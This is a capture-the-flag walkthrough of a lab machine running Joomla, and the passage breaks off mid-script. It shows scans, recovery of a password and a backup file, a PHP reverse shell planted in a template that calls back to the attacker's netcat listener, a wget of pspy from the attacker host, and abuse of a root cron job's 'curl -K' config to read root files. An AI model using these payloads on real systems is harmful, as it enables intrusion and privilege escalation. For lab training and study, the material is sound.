$ nmap -T4 -A -p- 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 15:24 CET
Stats: 0:04:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.55% done; ETC: 15:31 (0:01:58 remaining)
Stats: 0:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.37% done; ETC: 15:32 (0:01:18 remaining)
Stats: 0:08:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.73% done; ETC: 15:33 (0:00:17 remaining)
Warning: 10.10.10.150 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.150
Host is up (0.063s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
| 256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
24259/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 551.88 seconds
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.150
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/11/20 15:37:47 Starting gobuster
===============================================================
http://10.10.10.150/images (Status: 301)
http://10.10.10.150/templates (Status: 301)
http://10.10.10.150/media (Status: 301)
http://10.10.10.150/modules (Status: 301)
http://10.10.10.150/bin (Status: 301)
http://10.10.10.150/plugins (Status: 301)
http://10.10.10.150/includes (Status: 301)
http://10.10.10.150/language (Status: 301)
http://10.10.10.150/components (Status: 301)
http://10.10.10.150/cache (Status: 301)
http://10.10.10.150/libraries (Status: 301)
http://10.10.10.150/tmp (Status: 301)
http://10.10.10.150/layouts (Status: 301)
http://10.10.10.150/administrator (Status: 301)
http://10.10.10.150/cli (Status: 301)
http://10.10.10.150/server-status (Status: 403)
[ERROR] 2020/11/20 16:01:39 [!] Get http://10.10.10.150/Mexico_City: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/11/20 16:05:40 Finished
===============================================================
Browsing to http://10.10.10.150/administrator/ shows a Joomla login form.
The front page at http://10.10.10.150 carries a published post whose author and text give us two candidate user names:
- Super User
- Floris
Looking at the page source, an HTML comment right before the closing tag points at a suspicious secret.txt file:
</div>
</footer>
</body>
<!-- secret.txt -->
</html>
http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh
This string looks encoded rather than encrypted: 16 characters, all from the base64 alphabet.
Searching for «linux decode string» also points at base64, so it is worth a quick try.
$ echo Q3VybGluZzIwMTgh | base64 --decode
Curling2018!
Now we have two possible user names and a password.
Let's try them on the Joomla administrator login:
Once logged in, a PHP reverse shell can be added directly from the Joomla template editor (Extensions > Templates > Templates, then edit one of the template's PHP files) and triggered by requesting that file from the web server.
We use the pentestmonkey php-reverse-shell (https://github.com/pentestmonkey/php-reverse-shell) with $ip and $port pointed at our listener:
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.14'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.150] 39474
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:29:30 up 17:01, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd /home/floris
$ ls -la
total 44
drwxr-xr-x 6 floris floris 4096 May 22 2018 .
drwxr-xr-x 3 root root 4096 May 22 2018 ..
lrwxrwxrwx 1 root root 9 May 22 2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr 4 2018 .bashrc
drwx------ 2 floris floris 4096 May 22 2018 .cache
drwx------ 3 floris floris 4096 May 22 2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22 2018 .local
-rw-r--r-- 1 floris floris 807 Apr 4 2018 .profile
drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
-rw-r----- 1 floris floris 33 May 22 2018 user.txt
We don't have permission to read user.txt (mode 0640, owned by floris), but password_backup is world-readable.
$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...H
$
Rather than the backup itself, this is a text hex dump in xxd format: offset, hex groups, ASCII column. The first bytes, 42 5a 68 39 ("BZh9"), are the bzip2 signature, so the dump has to be turned back into binary (xxd -r) before anything can be decompressed.
Using CyberChef (From Hexdump, followed by the decompression operation that each layer's magic bytes call for):
After several rounds of decompression we end up with a plain-text file:
Password = 5d<wdCbdZu)|hChXll
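The same unpacking, scripted, as an added example that is not part of the original write-up or of CyberChef: reverse the xxd dump, identify each layer by its magic bytes and decompress it until only plain data remains. It needs only the Python standard library. The layer order in the constructed sample is an assumption chosen for the demo; to run it on the real file, pass the path of password_backup as the first argument.

```python
"""Reverse an xxd hex dump and peel nested compression layers by magic bytes.
Added example for this write-up (not the original post's or CyberChef's code).
Usage: peel.py password_backup   (no argument: run on a constructed sample)"""
import bz2
import gzip
import io
import sys
import tarfile

HEXDIGITS = set("0123456789abcdefABCDEF")


def unhexdump(text: str) -> bytes:
    """Equivalent of `xxd -r`: keep the hex groups after the offset, drop the
    ASCII column; also copes with a pasted dump whose spacing was collapsed."""
    out = bytearray()
    for line in text.splitlines():
        head, sep, rest = line.partition(":")
        head = head.strip()
        if not sep or not head or not set(head) <= HEXDIGITS:
            continue  # not an "offset: hex ... ascii" line
        if "  " in rest:
            # Well-formed xxd output: two spaces separate hex from ASCII.
            tokens = rest.split("  ", 1)[0].split()
        else:
            # Collapsed whitespace: accept 2/4-digit hex groups up to 16 bytes;
            # the first token that is not one starts the ASCII column.
            tokens = []
            for tok in rest.split():
                if (len(tok) not in (2, 4) or not set(tok) <= HEXDIGITS
                        or sum(map(len, tokens)) >= 32):
                    break
                tokens.append(tok)
        out += bytes.fromhex("".join(tokens))
    return bytes(out)


def identify(data: bytes) -> str:
    """Name the container by its magic bytes, "raw" if none is recognised."""
    if data[:3] == b"BZh":
        return "bzip2"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    return "raw"


def peel(data: bytes, max_layers: int = 16):
    """Decompress/unpack until no known container remains.
    Returns (innermost payload, layer names in the order they were removed)."""
    layers = []
    for _ in range(max_layers):
        kind = identify(data)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                files = [m for m in tf.getmembers() if m.isfile()]
                if not files:
                    raise ValueError("tar archive holds no regular file")
                kind = f"tar:{files[0].name}"  # a backup like this has one file
                data = tf.extractfile(files[0]).read()
        else:
            break
        layers.append(kind)
    return data, layers


def hexdump(data: bytes) -> str:
    """xxd-style dump, used only to build the constructed sample."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {groups:<39}  {text}")
    return "\n".join(lines) + "\n"


def build_sample(secret: bytes = b"Password = not-the-real-one\n") -> str:
    """Constructed input: password.txt in a tar, wrapped in bzip2, gzip and
    bzip2 again, then dumped like password_backup. The layer order is an
    assumption for the demo, not taken from the box."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(buf.getvalue()), mtime=0))
    return hexdump(blob)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            dump = fh.read()
    else:
        dump = build_sample()
    payload, layers = peel(unhexdump(dump))
    print("layers:", " -> ".join(layers) or "none")
    print(payload.decode("utf-8", "replace"), end="")
```

Identifying each layer by its magic bytes rather than by file extension is the point: a backup that has been re-wrapped several times carries no useful name, and trusting the header of the data you actually hold is what stops the loop at the right place.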
Now let's try the recovered credentials on the open SSH port:
user = `floris`
password = `5d<wdCbdZu)|hChXll`
$ ssh floris@10.10.10.150
floris@10.10.10.150's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Nov 23 11:09:11 UTC 2020
System load: 0.01 Processes: 174
Usage of /: 46.4% of 9.78GB Users logged in: 0
Memory usage: 24% IP address for ens33: 10.10.10.150
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$
floris@curling:~$ ls
admin-area password_backup user.txt
floris@curling:~$ cat user.txt
65ddXXXXXXXXXXXXXXXXXXXXXXXXXXXX
To go for the root flag we start with pspy.
pspy is a command line tool designed to snoop on processes without the need for root permissions. It lets you see commands run by other users, cron jobs, etc. as they execute.
https://github.com/DominicBreuker/pspy
The box is x86_64 (see the uname output from the reverse shell), so we need the pspy64 build, which we download from the release page and serve from our own machine over HTTP:
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
floris@curling:~$ wget http://10.10.14.14:8000/pspy64
--2020-11-30 09:34:47-- http://10.10.14.14:8000/pspy64
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===========================================>] 2.94M 1.44MB/s in 2.0s
2020-11-30 09:34:49 (1.44 MB/s) - ‘pspy64’ saved [3078592/3078592]
floris@curling:~$ ls -la
total 3052
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 .
drwxr-xr-x 3 root root 4096 May 22 2018 ..
drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
lrwxrwxrwx 1 root root 9 May 22 2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr 4 2018 .bashrc
drwx------ 2 floris floris 4096 May 22 2018 .cache
drwx------ 3 floris floris 4096 May 22 2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22 2018 .local
-rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
-rw-r--r-- 1 floris floris 807 Apr 4 2018 .profile
-rw-rw-r-- 1 floris floris 3078592 Nov 30 09:24 pspy64
-rw-r----- 1 floris floris 33 May 22 2018 user.txt
floris@curling:~$ chmod +x pspy64
floris@curling:~$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/11/30 09:38:35 CMD: UID=0 PID=84 |
2020/11/30 09:38:35 CMD: UID=101 PID=835 | /lib/systemd/systemd-resolved
2020/11/30 09:38:35 CMD: UID=100 PID=818 | /lib/systemd/systemd-networkd
2020/11/30 09:38:35 CMD: UID=0 PID=8 |
2020/11/30 09:38:35 CMD: UID=0 PID=7 |
2020/11/30 09:38:35 CMD: UID=62583 PID=615 | /lib/systemd/systemd-timesyncd
2020/11/30 09:38:35 CMD: UID=0 PID=6 |
2020/11/30 09:38:35 CMD: UID=0 PID=550 |
2020/11/30 09:38:35 CMD: UID=0 PID=509 | /lib/systemd/systemd-udevd
2020/11/30 09:38:35 CMD: UID=0 PID=504 | /sbin/lvmetad -f
2020/11/30 09:38:35 CMD: UID=0 PID=493 |
2020/11/30 09:38:35 CMD: UID=0 PID=487 |
2020/11/30 09:38:35 CMD: UID=0 PID=486 |
2020/11/30 09:38:35 CMD: UID=0 PID=484 | /lib/systemd/systemd-journald
2020/11/30 09:38:35 CMD: UID=0 PID=476 | /usr/bin/vmtoolsd
2020/11/30 09:38:35 CMD: UID=0 PID=42 |
2020/11/30 09:38:35 CMD: UID=0 PID=242 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2414 | ./pspy64
2020/11/30 09:38:35 CMD: UID=0 PID=241 |
2020/11/30 09:38:35 CMD: UID=0 PID=237 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2363 | -bash
2020/11/30 09:38:35 CMD: UID=1000 PID=2362 | sshd: floris@pts/0
2020/11/30 09:38:35 CMD: UID=0 PID=236 |
2020/11/30 09:38:35 CMD: UID=0 PID=230 |
2020/11/30 09:38:35 CMD: UID=0 PID=229 |
2020/11/30 09:38:35 CMD: UID=1000 PID=2287 | (sd-pam)
2020/11/30 09:38:35 CMD: UID=1000 PID=2286 | /lib/systemd/systemd --user
2020/11/30 09:38:35 CMD: UID=0 PID=228 |
2020/11/30 09:38:35 CMD: UID=0 PID=2277 | sshd: floris [priv]
2020/11/30 09:38:35 CMD: UID=0 PID=2276 |
2020/11/30 09:38:35 CMD: UID=0 PID=18 |
2020/11/30 09:38:35 CMD: UID=33 PID=1776 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1774 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1772 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1771 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1770 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1769 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1768 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1767 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=176 |
2020/11/30 09:38:35 CMD: UID=0 PID=173 |
2020/11/30 09:38:35 CMD: UID=0 PID=16 |
2020/11/30 09:38:35 CMD: UID=0 PID=15 |
2020/11/30 09:38:35 CMD: UID=0 PID=14 |
2020/11/30 09:38:35 CMD: UID=33 PID=1365 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=33 PID=1360 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=1340 | /usr/sbin/apache2 -k start
2020/11/30 09:38:35 CMD: UID=0 PID=13 |
2020/11/30 09:38:35 CMD: UID=111 PID=1272 | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
2020/11/30 09:38:35 CMD: UID=0 PID=1230 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/11/30 09:38:35 CMD: UID=0 PID=121 |
2020/11/30 09:38:35 CMD: UID=0 PID=12 |
2020/11/30 09:38:35 CMD: UID=0 PID=1176 | /usr/lib/policykit-1/polkitd --no-debug
2020/11/30 09:38:35 CMD: UID=0 PID=1162 | /usr/sbin/sshd -D
2020/11/30 09:38:35 CMD: UID=0 PID=1142 | /sbin/iscsid
2020/11/30 09:38:35 CMD: UID=0 PID=1138 | /sbin/iscsid
2020/11/30 09:38:35 CMD: UID=0 PID=1100 | /usr/lib/snapd/snapd
2020/11/30 09:38:35 CMD: UID=0 PID=11 |
2020/11/30 09:38:35 CMD: UID=0 PID=1091 | /usr/sbin/irqbalance --foreground
2020/11/30 09:38:35 CMD: UID=0 PID=1089 | /usr/sbin/cron -f
2020/11/30 09:38:35 CMD: UID=103 PID=1057 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/11/30 09:38:35 CMD: UID=0 PID=1056 | /lib/systemd/systemd-logind
2020/11/30 09:38:35 CMD: UID=0 PID=1055 | /usr/bin/python3 /usr/bin/networkd-dispatcher
2020/11/30 09:38:35 CMD: UID=0 PID=104 |
2020/11/30 09:38:35 CMD: UID=0 PID=1036 | /usr/sbin/atd -f
2020/11/30 09:38:35 CMD: UID=102 PID=1028 | /usr/sbin/rsyslogd -n
2020/11/30 09:38:35 CMD: UID=0 PID=1023 | /usr/bin/lxcfs /var/lib/lxcfs/
2020/11/30 09:38:35 CMD: UID=0 PID=1018 | /usr/bin/VGAuthService
2020/11/30 09:38:35 CMD: UID=0 PID=1014 | /usr/lib/accountsservice/accounts-daemon
2020/11/30 09:38:35 CMD: UID=0 PID=10 |
2020/11/30 09:38:35 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2020/11/30 09:39:01 CMD: UID=0 PID=2441 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2440 | sleep 1
2020/11/30 09:39:01 CMD: UID=0 PID=2439 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2438 |
2020/11/30 09:39:01 CMD: UID=0 PID=2437 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:39:01 CMD: UID=0 PID=2436 | /usr/sbin/CRON -f
2020/11/30 09:39:01 CMD: UID=0 PID=2435 | /usr/sbin/CRON -f
2020/11/30 09:39:01 CMD: UID=0 PID=2434 | /usr/sbin/CRON -f
2020/11/30 09:39:09 CMD: UID=0 PID=2443 | (ionclean)
2020/11/30 09:39:09 CMD: UID=0 PID=2453 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2452 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2451 | /bin/sh /usr/sbin/phpquery -V
2020/11/30 09:39:09 CMD: UID=0 PID=2450 | sort -rn -t: -k2,2
2020/11/30 09:39:09 CMD: UID=0 PID=2449 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2468 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2467 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2466 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2465 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2464 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2463 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2462 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2461 | /lib/systemd/systemd-udevd
2020/11/30 09:39:09 CMD: UID=0 PID=2460 | php7.2 -c /etc/php/7.2/apache2/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";
2020/11/30 09:39:09 CMD: UID=0 PID=2469 |
2020/11/30 09:39:09 CMD: UID=0 PID=2472 | sed -ne s/^session\.save_handler=\(.*\)$/\1/p
2020/11/30 09:39:09 CMD: UID=0 PID=2470 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2481 |
2020/11/30 09:39:09 CMD: UID=0 PID=2479 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2482 | php7.2 -c /etc/php/7.2/cli/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";
2020/11/30 09:39:09 CMD: UID=0 PID=2485 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2483 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=??? PID=2486 | ???
2020/11/30 09:39:09 CMD: UID=0 PID=2491 | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p
2020/11/30 09:39:09 CMD: UID=0 PID=2490 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2489 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2493 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2492 | /bin/sh -e /usr/lib/php/sessionclean
2020/11/30 09:39:09 CMD: UID=0 PID=2495 | pidof apache2 php7.2
2020/11/30 09:39:09 CMD: UID=0 PID=2497 | find /proc/1774/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2498 | find /proc/1772/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2499 | find /proc/1771/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=??? PID=2500 | ???
2020/11/30 09:39:09 CMD: UID=0 PID=2501 | find /proc/1769/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2502 |
2020/11/30 09:39:09 CMD: UID=0 PID=2503 | find /proc/1767/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2504 | find /proc/1365/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;
2020/11/30 09:39:09 CMD: UID=0 PID=2507 | find -O3 /var/lib/php/sessions/ -ignore_readdir_race -depth -mindepth 1 -name sess_* -type f -cmin +24 -delete
2020/11/30 09:39:09 CMD: UID=0 PID=2513 |
2020/11/30 09:39:09 CMD: UID=0 PID=2510 |
2020/11/30 09:40:01 CMD: UID=0 PID=2527 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2526 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2525 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2523 | /usr/sbin/CRON -f
2020/11/30 09:40:01 CMD: UID=0 PID=2522 | /usr/sbin/CRON -f
2020/11/30 09:40:01 CMD: UID=0 PID=2528 | sleep 1
2020/11/30 09:41:01 CMD: UID=0 PID=2533 | sleep 1
2020/11/30 09:41:01 CMD: UID=0 PID=2532 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:41:01 CMD: UID=0 PID=2531 | /usr/sbin/CRON -f
2020/11/30 09:41:01 CMD: UID=0 PID=2530 | /usr/sbin/CRON -f
2020/11/30 09:41:01 CMD: UID=0 PID=2535 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2534 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2541 | sleep 1
2020/11/30 09:42:01 CMD: UID=0 PID=2540 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2539 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:42:01 CMD: UID=0 PID=2538 | /usr/sbin/CRON -f
2020/11/30 09:42:01 CMD: UID=0 PID=2537 | /usr/sbin/CRON -f
2020/11/30 09:42:01 CMD: UID=0 PID=2542 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:02 CMD: UID=0 PID=2543 | cat /root/default.txt
Among all that output, a few entries stand out:
...
2020/11/30 09:39:01 CMD: UID=0 PID=2441 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2439 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0 PID=2437 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2527 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0 PID=2526 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0 PID=2525 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2532 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:41:01 CMD: UID=0 PID=2535 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0 PID=2534 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2540 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0 PID=2539 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:42:01 CMD: UID=0 PID=2542 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
...
Two commands are executed by root once a minute, and their parents are /usr/sbin/CRON -f, so this is a root cron job:
/bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
The curl command uses two options:
-K, --config <file>: Specify a text file to read curl arguments from.
-o, --output <file>: Write output to <file> instead of stdout.
So root takes its curl arguments from admin-area/input and writes whatever curl fetched to admin-area/report. Both files are root-owned but group-writable by floris (rw-rw---- root floris), so we can dictate what root's curl does and read the result. The first job resets input from /root/default.txt, but only after a one-second sleep, so curl has already read our version by then: whatever we place in input is consumed once, at the next minute boundary, and then overwritten again.
Since curl accepts file:// URLs, the simplest use is to have root read a file for us:
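The filtering we just did by eye, as an added example that is not part of the original post or of pspy: parse pspy's CMD lines, keep those run as UID 0 and flag the commands whose arguments reference a path under a tree an unprivileged user can write to, counting repetitions so a cron job stands out from a one-off. The sample lines are copied from the pspy output above; the list of user-writable trees is an assumption for a stock Ubuntu box.

```python
"""Triage pspy output: which root processes touch paths a user can write to?
Added example for this write-up (not part of the original post or of pspy).
Usage: triage.py pspy.log   (no argument: run on the sample lines below)"""
import re
import sys

PSPY_LINE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+|\?+)\s+PID=(?P<pid>\d+)\s+\|\s*(?P<cmd>.*)$"
)
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")
# Trees an unprivileged user can normally write to. Assumption: a stock
# Ubuntu layout; add site-specific ones (/srv, /opt/app, ...) as needed.
UNTRUSTED_ROOTS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/", "/var/www/")

# Sample input: a subset of the pspy lines captured above.
SAMPLE_LINES = [
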